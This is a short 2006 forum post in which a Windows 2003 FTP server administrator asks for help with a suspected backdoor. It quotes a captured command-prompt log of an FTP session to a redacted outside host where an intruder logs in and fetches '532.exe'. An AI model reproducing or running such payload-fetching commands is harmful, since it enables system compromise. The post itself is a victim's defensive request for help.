FTP server - possible virus/backdoor/trojan?
Posted on 2006-11-30
I have a standard fully patched Windwos 2003 Server running as an FTP server, I have done a full virus and spywear scan but everyso often I log in va VNC and there will be a command prompt open with the following text:
Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection
This is VERY worrying - and I cant find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?